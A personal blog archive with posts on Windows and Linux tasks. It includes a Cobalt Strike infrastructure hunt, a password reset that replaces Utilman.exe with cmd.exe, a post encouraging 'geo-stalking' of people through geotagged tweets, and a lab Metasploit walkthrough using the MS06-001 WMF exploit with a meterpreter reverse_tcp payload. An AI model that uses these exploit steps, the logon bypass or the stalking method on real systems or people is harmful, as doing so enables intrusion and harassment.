Tag Archives: windows

Hunting for possible attacker Cobalt-Strike infra

Recently we had an incident in which suspicious traffic to an external C2 was observed. The initial finding was that the IP 172.241.27.17 (in 172.241.24.0/21) resolved to
atakai[-]technologies[.]host, according to passive DNS in VirusTotal [1].

Digging further into this IP showed that it has port 50050 open. Both the Recorded Future threat analysis report and the Cobalt Strike Team Server Population Study note that the default port for the Cobalt Strike team server (the controller) is 50050.

So I asked myself: what if the neighbouring IPs had also been set up as Cobalt Strike infrastructure? I decided to go on this journey…

First, we know that the IP range is 172.241.24.0/21. Using a CIDR calculator, we can convert the CIDR notation into a range of IP addresses.

The result is 2048 addresses: 172.241.24.0 to 172.241.31.255.

Next, we use the online tool Reverse IP & DNS API from WhoisXML API. Its function is to reveal all domains that share an IP address. Example below:

To use this tool you need to buy credits for its API. A free account only gets 100 credits for the Domain Research Suite tools, but for this case we need around 2050 credits (one per IP in the range). According to their website, 1000 DRS credits = $19.00. So.. yeah..

Once you have enough credits, you can use a script like the one below:

#!/bin/bash
# Query the WhoisXML reverse-IP API once per address in ip.txt (one IP per line)
# and append each raw JSON response as its own line to output.txt.
url="https://reverse-ip.whoisxmlapi.com/api/v1?apiKey=whoisxml_apikey&ip="

while IFS= read -r ip; do
	[ -z "$ip" ] && continue          # skip blank lines
	curl -s "${url}${ip}" >> output.txt
	echo >> output.txt                # newline so each response is one record
done < ip.txt

Remember to put your API key into the script in place of whoisxml_apikey (or read it from an environment variable so the key is not stored in the script or in your shell history). It writes the raw JSON results to "output.txt".

After that, import the result into Excel. Then sort and select possible domains from the output based on the domain naming convention, e.g. atakai, amatai, amamai:

Now we have suspected IPs & domains. To dig further, we'll use Shodan.io to see which ports are open on those IPs.

To do that, we'll use the one-liner below (the unquoted braces are bash brace expansion, so curl is run once per IP and jq reads the resulting stream of JSON objects):

$ curl -s https://api.shodan.io/shodan/host/{172.241.27.17,172.241.27.44,172.241.27.62,172.241.27.65,172.241.27.66,172.241.27.68,172.241.27.72,172.241.27.225,172.241.29.155,172.241.29.156,172.241.29.157}?key=shodan_apikey | jq -r '. | "IP: \(.ip_str) Ports: \(.ports)"'

The output should be like this:

Now we know that 7 of the 11 (no pun intended) IPs were observed by Shodan with port 50050 open. This indicates that this set of IPs is possibly part of Cobalt Strike infrastructure. Note that an open 50050 on its own is a weak indicator: operators can change the default port and other software can listen there, so treat it as a pivot to confirm against the team server's TLS certificate or a retrieved beacon configuration rather than as proof.
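The three pivots above (CIDR expansion, a naming-convention filter over the reverse-IP results, and the port-50050 check on Shodan host records) as one offline function. This is an added example, not code from the original post. The reverse-IP records are constructed to resemble the WhoisXML v1 response (a "result" list of {"name": ...} entries; an assumed shape), the Shodan records carry only the "ip_str" and "ports" fields the jq filter above reads, and none of the sample data is a real API response.

```python
"""Offline model of the Cobalt Strike infra hunt: expand the block, keep hosts
whose domains follow the attacker's naming convention, and intersect with hosts
exposing the team server's default port."""
import ipaddress
import re

CS_TEAMSERVER_DEFAULT_PORT = 50050  # default team server port, per the reports cited above


def expand_cidr(cidr):
    """Return every address in the block, like the CIDR-to-range tool."""
    return [str(ip) for ip in ipaddress.ip_network(cidr, strict=False)]


def suspicious_domains(reverse_ip_records, name_pattern):
    """Keep only hosts with at least one domain matching the naming convention.

    Returns {ip: [matching domains]}; an IP with no match is dropped."""
    rx = re.compile(name_pattern, re.IGNORECASE)
    hits = {}
    for rec in reverse_ip_records:
        names = sorted(d["name"] for d in rec.get("result", []) if rx.search(d["name"]))
        if names:
            hits[rec["ip"]] = names
    return hits


def hosts_with_port(shodan_records, port):
    """IPs whose Shodan port list contains `port`."""
    return {r["ip_str"] for r in shodan_records if port in r.get("ports", [])}


def hunt(cidr, reverse_ip_records, shodan_records, name_pattern,
         port=CS_TEAMSERVER_DEFAULT_PORT):
    """Tie the pivots together; candidates must satisfy both signals."""
    block = expand_cidr(cidr)
    in_block = set(block)
    by_name = {ip: names for ip, names in
               suspicious_domains(reverse_ip_records, name_pattern).items()
               if ip in in_block}
    by_port = hosts_with_port(shodan_records, port) & in_block
    return {
        "range_size": len(block),
        "first": block[0],
        "last": block[-1],
        "by_name": by_name,
        "by_port": sorted(by_port),
        # A weak port indicator plus the naming pivot: only hosts with both count
        "candidates": sorted(set(by_name) & by_port),
    }


# Constructed sample data for the demo (not real API output).
REVERSE_IP_SAMPLE = [
    {"ip": "172.241.27.17", "result": [{"name": "atakai-technologies.host"}]},
    {"ip": "172.241.27.44", "result": [{"name": "amatai-technologies.host"},
                                       {"name": "cdn.static-assets.example"}]},
    {"ip": "172.241.27.50", "result": [{"name": "shop.example"}]},
    {"ip": "172.241.29.155", "result": [{"name": "amamai-tech.host"}]},
]
SHODAN_SAMPLE = [
    {"ip_str": "172.241.27.17", "ports": [22, 50050]},
    {"ip_str": "172.241.27.44", "ports": [80, 443, 50050]},
    {"ip_str": "172.241.27.50", "ports": [50050]},   # port only, no naming match
    {"ip_str": "172.241.29.155", "ports": [443]},    # naming match only, no 50050
]
NAME_PATTERN = r"^(atakai|amatai|amamai)"  # assumed convention from the hits above


def demo():
    return hunt("172.241.24.0/21", REVERSE_IP_SAMPLE, SHODAN_SAMPLE, NAME_PATTERN)


if __name__ == "__main__":
    import json
    print(json.dumps(demo(), indent=2))
```

Feeding the real output.txt and Shodan responses in is a matter of `json.loads` per line; the intersection is the point, since a host that only shows 50050 (172.241.27.50 in the sample) or only the naming pattern (172.241.29.155) stays in the "look closer" buckets rather than being called infrastructure.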

The next step would be to look up the registration date of each domain in Whois data. But I'm too lazy to continue this. I've also found that several Whois providers give different information about the domain registration date. So yeah, maybe I'll update next time when I'm free 😉

Import & export installed Cygwin packages

Recently I moved to a new workstation. On my old workstation I had installed a bunch of Cygwin packages.

So I thought: can I somehow migrate my installed Cygwin packages from the old workstation to the new one?

The answer is yes. Follow along on this wonderful journey XD

First you need to save a list of what you have installed in Cygwin on the old workstation.

To do this, open the Cygwin terminal and run the command below:

grep " 1$" /etc/setup/installed.db | awk '{printf "%s%s",sep,$1; sep=","} END{print ""}' > cygwin_packages.txt

This dumps the list of installed Cygwin packages on your workstation and saves it as a comma-separated list in a text file named "cygwin_packages.txt".

Next, go to your Cygwin home folder (commonly located under "C:\cygwin64\home\"), open the "cygwin_packages.txt" file we just saved and copy its contents (CTRL-C).

Next, on your new workstation, make sure you have downloaded the latest Cygwin installer from cygwin.com: "setup-x86.exe" (32-bit) or "setup-x86_64.exe" (64-bit).

Then open a Windows cmd and change directory to where you saved the Cygwin installer; in my case the Downloads folder "C:\Users\Zam\Downloads".

Then run the command below in cmd, pasting the contents of cygwin_packages.txt inside the double quotes (use setup-x86_64.exe instead if you downloaded the 64-bit installer):

setup-x86.exe -q -P "<paste the cygwin_packages.txt content here>"

You should see the Cygwin GUI open and a UAC permission pop-up:

Click "Yes", go through the "Next" buttons and wait until the installation finishes.

Upgrade Python packages using pip

As the title says: how to update all of your Python packages via pip.

for Linux/*nix:

pip freeze --local | grep -v '^\-e' | cut -d = -f 1  | xargs -n1 pip install -U

p/s: you may need to run it with sudo for a system-wide install. Probably. (Inside a virtualenv you won't.)

for Windows:

for /F "delims===" %i in ('pip freeze -l') do pip install -U %i
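The same "upgrade everything" loop using pip's machine-readable `pip list --outdated --format=json` instead of parsing `pip freeze`, as an added example that is not from the original post. It lets you hold back packages you deliberately pin, since blindly upgrading everything is how an unreviewed release lands in your environment. The sample JSON below is constructed, and the `editable_project_location` field used to skip editable installs is an assumption about the field name in newer pip versions.

```python
"""Upgrade outdated pip packages from pip's JSON listing, with a hold-back list."""
import json
import subprocess
import sys


def outdated_names(pip_json, pinned=()):
    """Names to upgrade from `pip list --outdated --format=json` output.

    Pinned names are skipped (case-insensitively); editable installs, which
    newer pip marks with "editable_project_location" (assumed field name), are
    skipped too, matching the grep -v '^-e' in the Linux one-liner above."""
    hold = {p.lower() for p in pinned}
    names = []
    for entry in json.loads(pip_json):
        name = entry["name"]
        if name.lower() in hold or entry.get("editable_project_location"):
            continue
        names.append(name)
    return sorted(names, key=str.lower)


def upgrade_all(pinned=(), dry_run=True):
    """List outdated packages in the current interpreter; upgrade them unless dry_run."""
    listing = subprocess.run(
        [sys.executable, "-m", "pip", "list", "--outdated", "--format=json"],
        capture_output=True, text=True, check=True,
    ).stdout
    names = outdated_names(listing, pinned)
    if not dry_run:
        for name in names:
            subprocess.run([sys.executable, "-m", "pip", "install", "-U", name], check=False)
    return names


# Constructed sample of pip's JSON output for the offline demo (not real output).
SAMPLE_OUTDATED = json.dumps([
    {"name": "requests", "version": "2.25.0", "latest_version": "2.31.0", "latest_filetype": "wheel"},
    {"name": "Django", "version": "3.2", "latest_version": "4.2", "latest_filetype": "wheel"},
    {"name": "mytool", "version": "0.1", "latest_version": "0.2", "latest_filetype": "sdist",
     "editable_project_location": "/home/zam/src/mytool"},
])

if __name__ == "__main__":
    print(outdated_names(SAMPLE_OUTDATED, pinned=["Django"]))  # ['requests']
    print(upgrade_all(pinned=["Django"]))  # dry run against the live environment
```

Using `sys.executable -m pip` rather than a bare `pip` makes sure the upgrade hits the interpreter you are running, which is the usual cause of "I upgraded it but the old version is still imported".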

Credit:

http://stackoverflow.com/questions/2720014/upgrading-all-packages-with-pip

Installing Owncloud on Nginx (Ubuntu 12.04)

Here I want to share how to create your own sync server, like Dropbox.
The software we will use is ownCloud.

But before we start, please make sure you already have nginx up and running.
For a tutorial, please refer here.

1. Make sure your OS is updated

apt-get update
apt-get upgrade

2. Install the required packages

apt-get install php5-cgi autoconf automake autotools-dev curl libapr1 libtool curl libcurl4-openssl-dev php-pear php-xml-parser php5 php5-cli php5-common php5-curl php5-dev php5-gd php5-sqlite php5-fpm

3. Edit the nginx site config file

vi /etc/nginx/sites-available/default

4. Edit it like this;
Copy the block below;

server {
        listen   80;
        root /usr/share/nginx/www;
        index index.php index.html index.htm;
        server_name _;

        location / {
                try_files $uri $uri/ @webdav;
        }

        # ownCloud lives under /owncloud, so its private files must be denied there
        location ~ ^/owncloud/(data|config|\.ht|db_structure\.xml|README) {
                deny all;
        }

        error_page 500 502 503 504 /50x.html;
        location = /50x.html {
                root /usr/share/nginx/www;
        }

        location ~ \.php5?$ {
                try_files $uri =404;
                fastcgi_split_path_info ^(.+\.php)(/.+)$;
                fastcgi_pass unix:/tmp/php5-fpm.sock;
                fastcgi_index index.php;
                include fastcgi_params;
                fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        }

        location ~ ^/owncloud/remote\.php(/.*)$ {
                fastcgi_split_path_info ^(.+\.php)(/.*)$;
                fastcgi_pass unix:/tmp/php5-fpm.sock;
                include fastcgi_params;
                fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
                fastcgi_param PATH_INFO $fastcgi_path_info;
        }

        location @webdav {
                fastcgi_split_path_info ^(.+\.php)(/.*)$;
                fastcgi_pass unix:/tmp/php5-fpm.sock;
                include fastcgi_params;
                fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        }

        location ~ /\.ht {
                deny all;
        }
}

The "root /usr/share/nginx/www" line defines the document root for nginx.
You can change it to any path you like.
The dots in the regexes are escaped so that, for example, the deny rule really matches ".ht" and "db_structure.xml" and the data/config directories are protected under /owncloud/ where they actually live. The fastcgi_pass socket must match the listen setting in /etc/php5/fpm/pool.d/www.conf: on Ubuntu 12.04 php5-fpm listens on 127.0.0.1:9000 by default, so either set listen = /tmp/php5-fpm.sock there or use fastcgi_pass 127.0.0.1:9000 in every location above. Ubuntu's fastcgi_params at that time did not set SCRIPT_FILENAME, which is why it is set explicitly. This setup serves ownCloud over plain HTTP; put it behind TLS before exposing it beyond localhost.

5. Edit /etc/php5/conf.d/xcache.ini (only present if you installed php5-xcache, which is not in the package list above; skip this step otherwise)
Edit these two lines;

xcache.size = 64M
xcache.var_size = 64M

6. Edit /etc/php5/fpm/php.ini
Edit these two lines (the PHP directive is upload_max_filesize, not max_upload_size, and post_max_size must be at least as large as it);

post_max_size = 2G
upload_max_filesize = 2G

7. Reload php5-fpm

/etc/init.d/php5-fpm reload

8. Get the ownCloud tarball (the latest at the time of writing was 4.5.5; that release is long unsupported, so pick a current one from owncloud.org and verify the published checksum or signature before extracting)

wget http://mirrors.owncloud.org/releases/owncloud-4.5.5.tar.bz2

9. Extract it into /usr/share/nginx/www

tar xvf owncloud-4.5.5.tar.bz2

So the path will be /usr/share/nginx/www/owncloud after extracted & the URL will be http://localhost/owncloud

10. Set the directory ownership;

chown -R www-data:www-data /usr/share/nginx/www

Replace '/usr/share/nginx/www' with the path you prefer. (It must be the same as the root in /etc/nginx/sites-available/default.)

11. Go to http://localhost/owncloud or http://<your-server-address>/owncloud
Create a new admin account. Also make sure the data folder path is correct (the default owncloud/data is the one the deny rule in the nginx config protects).

12. Create a new folder named "clientsync", something like this;
13. Get the Desktop Sync Client from http://owncloud.org/sync-clients/
Install it and enter your credentials.

14. If everything is fine, your ownCloud has been configured properly. Congratz!

Done. Hope it helps. 🙂

Reset Windows Server 2008 R2 password

Reset the administrator/user password on Windows Server 2008 R2 using the Windows installation disk. This needs boot access to the machine (physical or a virtual console), does not work when the system volume is encrypted (e.g. BitLocker) and the key is unavailable, and replaces a system binary, so restore it afterwards (last step).

  1. Insert the Windows Server 2008 installation DVD
  2. Restart the computer and select boot from DVD
  3. Choose the option "Repair your computer"
  4. Select "Command Prompt"
  5. Type "C:"
  6. Then "CD C:\Windows\System32"
  7. MOVE Utilman.exe Utilman.exe.bak
  8. COPY Cmd.exe Utilman.exe
  9. Restart Windows
  10. At the login screen press Win+U (Ease of Access); this now launches cmd.exe as SYSTEM
  11. If the administrator account is disabled, enable it from this prompt with "NET USER administrator /active:yes" (running it from the DVD's command prompt instead would only change the recovery environment, not the installed OS)
  12. NET USER <username> <newpassword>, e.g. NET USER administrator Presto!
  13. Restart the computer again, boot from the DVD as before and move the original Utilman.exe back, e.g. MOVE Utilman.exe.bak Utilman.exe
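The same trick from the defender's side, as an added example that is not part of the original post: the accessibility binaries the logon screen launches as SYSTEM (Utilman.exe, and by the same method sethc.exe, osk.exe, Narrator.exe, Magnify.exe and DisplaySwitch.exe) should never hash the same as cmd.exe, and a leftover Utilman.exe.bak from step 7 is evidence in itself. Point `find_swapped_binaries` at C:\Windows\System32 on a live host or at the System32 of a mounted offline image; `demo()` builds a constructed directory with placeholder bytes (not real PE files) so the check runs anywhere.

```python
"""Detect the Utilman.exe / cmd.exe swap by hashing System32's accessibility binaries."""
import hashlib
import tempfile
from pathlib import Path

ACCESSIBILITY_BINARIES = ("Utilman.exe", "sethc.exe", "osk.exe",
                          "Narrator.exe", "Magnify.exe", "DisplaySwitch.exe")


def sha256_of(path):
    """Streamed SHA-256 so large binaries are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def find_swapped_binaries(system32):
    """Return {"swapped": [...], "leftover_backups": [...]} for a System32 directory.

    "swapped" lists accessibility binaries whose content is identical to cmd.exe;
    "leftover_backups" lists files such as Utilman.exe.bak left by the rename."""
    system32 = Path(system32)
    cmd_hash = sha256_of(system32 / "cmd.exe")
    swapped = [name for name in ACCESSIBILITY_BINARIES
               if (system32 / name).is_file() and sha256_of(system32 / name) == cmd_hash]
    prefixes = tuple(b.lower() + "." for b in ACCESSIBILITY_BINARIES)  # e.g. "utilman.exe."
    leftovers = sorted(p.name for p in system32.iterdir()
                       if p.is_file() and p.name.lower().startswith(prefixes))
    return {"swapped": swapped, "leftover_backups": leftovers}


def demo():
    """Constructed System32 lookalike: cmd.exe copied over Utilman.exe, backup left behind."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        cmd = b"MZ\x90\x00cmd.exe placeholder body"          # constructed, not a real PE
        (d / "cmd.exe").write_bytes(cmd)
        (d / "Utilman.exe").write_bytes(cmd)                    # the swap from step 8
        (d / "Utilman.exe.bak").write_bytes(b"MZ\x90\x00original utilman")
        (d / "sethc.exe").write_bytes(b"MZ\x90\x00sticky keys")  # untouched
        return find_swapped_binaries(d)


if __name__ == "__main__":
    print(demo())
```

A hash comparison only catches a copied binary; the variant that registers cmd.exe as a debugger for these executables under Image File Execution Options leaves the files intact, so pair this with a check of that registry key on live hosts.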

Geo-stalking with Bing Maps and the Twitter Maps App

Geo/social stalking is fun. Bing Maps lets you add various "apps" to the map to enhance your Bing Maps experience. One of the cooler ones is the Twitter Map app, which lets you map geotagged tweets.

Let's start somewhere fun, like the German-Malaysian Institute (GMi), Bangi, and see who's tweeting around there.. ;D

First, open www.bing.com/maps/

Then you can switch to Aerial View for a nicer look. ;D
You can change to any other place you want to view, e.g. your home, college or workplace.

Then select the Map apps option..

Then select the Twitter Maps app..

Wait a while for the page to load the necessary things (the tweets around the area of the map you are currently viewing)

Aaannndd.. Ta-Da! Happy stalking. ;D

Thanks to carnal0wnage for this tip. 😉

Metasploit?

Have you ever wanted to use Metasploit?
Have you ever managed to get a session using Metasploit?
I never managed to use Metasploit before.. 🙁

But I never give up (except on certain things)..
Eventually I got it to work..
And got access to that PC too.. 🙂

So, let me share how I did it..
First, install Metasploit.
Any version will do.
You can update it later.

After installing, don't forget to update,
so you'll have more exploits available later.

After installing & updating,
run Metasploit.
Run the console one (msfconsole).
Because people always say
the CLI is more effective.
So you should try it.. 😉

Once it's running,
type this..

use windows/browser/ms06_001_wmf_setabortproc

That's the exploit we'll use..
This exploit uses the browser (IE) to do its work..

After setting your exploit,
set your payload..

set payload windows/meterpreter/reverse_tcp

After setting the payload,
assign/fill in whatever is needed, such as LHOST, LPORT, SRVHOST, URL & other relevant options..
(192.168.56.x is the VirtualBox host-only network, so both the attacker and the victim here are lab VMs.)

set SRVHOST 192.168.56.101
set LHOST 192.168.56.101

After setting everything,
type show options to review all your settings..
Check whether they're right. Fill in whatever it requires if you haven't already..

Once everything is set,
type exploit..
It will output something like this..

[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[-] Handler failed to bind to 192.168.56.101:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://192.168.56.101:8080/asjKYXWBb3z
[*] Server started.
[*] Sending exploit to 192.168.56.102:1274...
[*] Sending stage (748032 bytes) to 192.168.56.102

So you have to get your victim to visit the URL http://192.168.56.101:8080/asjKYXWBb3z..
Only then will it work..
Otherwise the exploit & payload will never run.. :p

Once your victim opens the URL,
you'll see in your msfconsole the flow of the exploit being run against the victim who opened it..

If your exploit succeeds,
it will output something like this..

[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.102:1275) at 2010-08-07 00:57:21 +0800

There.. Got it! You now have 1 session with them..
You can upload/download and do all sorts of things on their PC..
Let's have a look..

msf exploit(ms06_001_wmf_setabortproc) > sessions -l

Active sessions
===============

Id  Type         Information                         Connection
--  ----         -----------                         ----------
1   meterpreter  4NGRY-LE0P4RDzer0 @ 4NGRY-LE0P4RD  192.168.56.101:4444 -> 192.168.56.102:1275

msf exploit(ms06_001_wmf_setabortproc) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:\Documents and Settings\zer0\Desktop
===============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:17 +0800  .
40777/rwxrwxrwx   0        dir   2010-06-05 15:09:29 +0800  ..
100777/rwxrwxrwx  690176   fil   2009-10-28 10:56:12 +0800  .NET Version Detector 2010.exe
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:19 +0800  Core_impact4
40777/rwxrwxrwx   0        dir   2010-06-05 16:37:23 +0800  Desktop
100666/rw-rw-rw-  1677     fil   2010-06-26 04:14:53 +0800  Process Hacker.lnk
100666/rw-rw-rw-  626      fil   2010-06-05 15:16:34 +0800  mirc.lnk
40777/rwxrwxrwx   0        dir   2010-06-05 14:54:58 +0800  nc111nt
100777/rwxrwxrwx  1261193  fil   2010-03-29 16:40:18 +0800  processhacker-1.11-setup.exe

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 08:00:27:af:62:54
IP Address  : 192.168.56.102
Netmask     : 255.255.255.0

Yay! I succeeded. Haha..
It's a simple thing anyway..
I guess other people won't think much of it that I can do this.. 🙁

Anyway, happy trying.
If there's anything, you can ask me.. 🙂